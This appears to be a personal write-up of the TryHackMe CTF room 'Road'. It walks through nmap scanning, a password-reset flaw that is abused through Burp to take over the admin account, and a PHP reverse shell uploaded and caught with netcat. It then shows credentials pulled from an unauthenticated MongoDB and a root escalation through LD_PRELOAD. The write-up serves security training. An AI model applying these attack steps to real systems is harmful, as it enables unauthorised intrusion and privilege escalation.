Road Write Up
Overview
Road is a medium rated CTF room on TryHackMe created by StillNoob. Although rated as medium I would put it down as easy as the *cough* road is nicely laid out for you.
Nmap
I started a nmap scan to check for available ports.
└──╼ $sudo nmap -sC -sV -oA nmap/initial 10.10.149.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 09:52 GMT
Nmap scan report for 10.10.149.149
Host is up (0.055s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
| 256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_ 256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sky Couriers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
2 ports open:
- 22 - SSH - Openssh 8.2p1
- 80 - HTTP - Apache httpd 2.4.41
I did a second nmap scan on all ports but no other ports were open.
Enumeration
Taking a look at the web server shows a simple courier web page.
I tested the track order search but it didn’t do anything so I moved on and clicked merchant central which took me to a login form.
I tried a few common credentials combinations but had no joy so registered my own account.
Once in I got access to a static dashboard, none of the links on the left worked other than ‘ResetUser’. However I could view my profile.
The only option available was to upload an image, however this needs be done my the admin. But now I have the admins email I might be able to use the reset user function to reset the admin’s password.
On the ResetUser page the username is grey out but I put in a new password and opened Burp. With Intercept on I submitted the request.
In Burp I can see my account name but no protection mechanisms.
I changed the username to the admin account and forward the request.
I now have access to the admin account!
Initial Access
Now I have access to the admin account, I should be able to upload a file. The site is using PHP so I tried uploading a php reverse shell. I copied a PHP reverse shell to my directory and edited the IP and port.
└──╼ $cp /usr/share/webshells/php/php-reverse-shell.php .
┌─[daz@parrotos]─[~/Documents/TryHackMe/Road]
└──╼ $mv php-reverse-shell.php shell.php
I then uploaded the file and started a listener using the command ‘nc -nvlp 4444
’.
The profile picture (top right) hasn’t changed or error’d, so I inspect the element to show the src reference.
My upload is not in the assets folder.
However, looking at the source code for the profile page ‘http://10.10.149.149/v2/profile.php’ is a comment with a path for profile images.
The first time I scanned the source code I missed the comment, using curl is a quick and crude way of pulling all the comments off a web page which can be useful with a large web page.
└──╼ $curl -s http://10.10.149.149/v2/profile.php | grep '<!--'
<!--<link rel="stylesheet" href="../assets/css/bootstrap.min.css" crossorigin="anonymous">-->
<!-- <script src="/assets/js/dataTable.min.js"></script> -->
<!-- <div class="alert alert-danger">Take action</div> -->
<!-- </ul> -->
<!-- /v2/profileimages/ -->
<!-- Include Required Prerequisites -->
<!-- Include Date Range Picker -->
Going to the path, I can list the images however I know I named my file shell.php so I navigate to ‘http://10.10.149.149/v2/profileimages/shell.php’.
I have a shell!
└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.8.21.217] from (UNKNOWN) [10.10.149.149] 59984
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
10:20:14 up 32 min, 0 users, load average: 0.00, 0.02, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Priv Esc 1
I got a shell as www-data, I can use this to grab the user.txt flag but I need to now find a way to become the webdeveloper user.
$ whoami
www-data
$ cd /home/
$ ls
webdeveloper
$ cd webdeveloper
$ ls -lah
total 36K
drwxr-xr-x 4 webdeveloper webdeveloper 4.0K Oct 8 10:59 .
drwxr-xr-x 3 root root 4.0K May 25 2021 ..
lrwxrwxrwx 1 webdeveloper webdeveloper 9 May 25 2021 .bash_history -> /dev/null
-rw-r--r-- 1 webdeveloper webdeveloper 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 webdeveloper webdeveloper 3.7K Feb 25 2020 .bashrc
drwx------ 2 webdeveloper webdeveloper 4.0K May 25 2021 .cache
drwxrwxr-x 3 webdeveloper webdeveloper 4.0K May 25 2021 .local
-rw------- 1 webdeveloper webdeveloper 51 Oct 8 10:59 .mysql_history
-rw-r--r-- 1 webdeveloper webdeveloper 807 Feb 25 2020 .profile
-rw-r--r-- 1 webdeveloper webdeveloper 0 Oct 7 17:53 .sudo_as_admin_successful
-rw-r--r-- 1 webdeveloper webdeveloper 33 May 25 2021 user.txt
I enumerate the box and take a look at the listening ports and find MongoDB is listening on 27017.
$ ss -tulp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:domain 0.0.0.0:*
udp UNCONN 0 0 10.10.149.149%eth0:bootpc 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:9000 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:27017 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:mysql 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:domain 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 511 *:http *:*
tcp LISTEN 0 128 [::]:ssh [::]:*
$
Connecting to mongo I found the webdeveloper credentials, Ive redacted them in the output below.
$ mongo
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("0ad03a25-0c2d-4c46-8adf-bb97086a2f15") }
MongoDB server version: 4.4.6
show dbs
admin 0.000GB
backup 0.000GB
config 0.000GB
local 0.000GB
use backup
switched to db backup
show collections
collection
user
db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
exit
bye
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
$
I can now SSH in to the machine as webdeveloper.
└──╼ $ssh webdeveloper@10.10.149.149
The authenticity of host '10.10.149.149 (10.10.149.149)' can't be established.
ECDSA key fingerprint is SHA256:zSoCEcBBY73hNL9ItPA4CnB/405/W6GQYsl94qRMkOo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.149.149' (ECDSA) to the list of known hosts.
webdeveloper@10.10.149.149's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 29 Nov 2021 10:26:45 AM UTC
System load: 0.0 Processes: 121
Usage of /: 60.0% of 9.78GB Users logged in: 0
Memory usage: 63% IPv4 address for eth0: 10.10.149.149
Swap usage: 0%
185 updates can be installed immediately.
100 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Oct 8 10:52:42 2021 from 192.168.0.105
webdeveloper@sky:~$
Priv Esc 2
Once connected as webdeveloper I did ‘sudo -l
’, there is a binary the user can run that could be vulnerable however LD_PRELOAD is configured which could also provide a path to priv esc.
webdeveloper@sky:~$ sudo -l
Matching Defaults entries for webdeveloper on sky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD
User webdeveloper may run the following commands on sky:
(ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:~$
Using the article at Hacking Articles provides a great step by step on how to exploit this. I created the shell.c file as per the article and run the sudo command to become root!
webdeveloper@sky:/tmp$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
webdeveloper@sky:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
Thanks for reading!
============================================================
Any comments or feedback welcome! You can find me on twitter.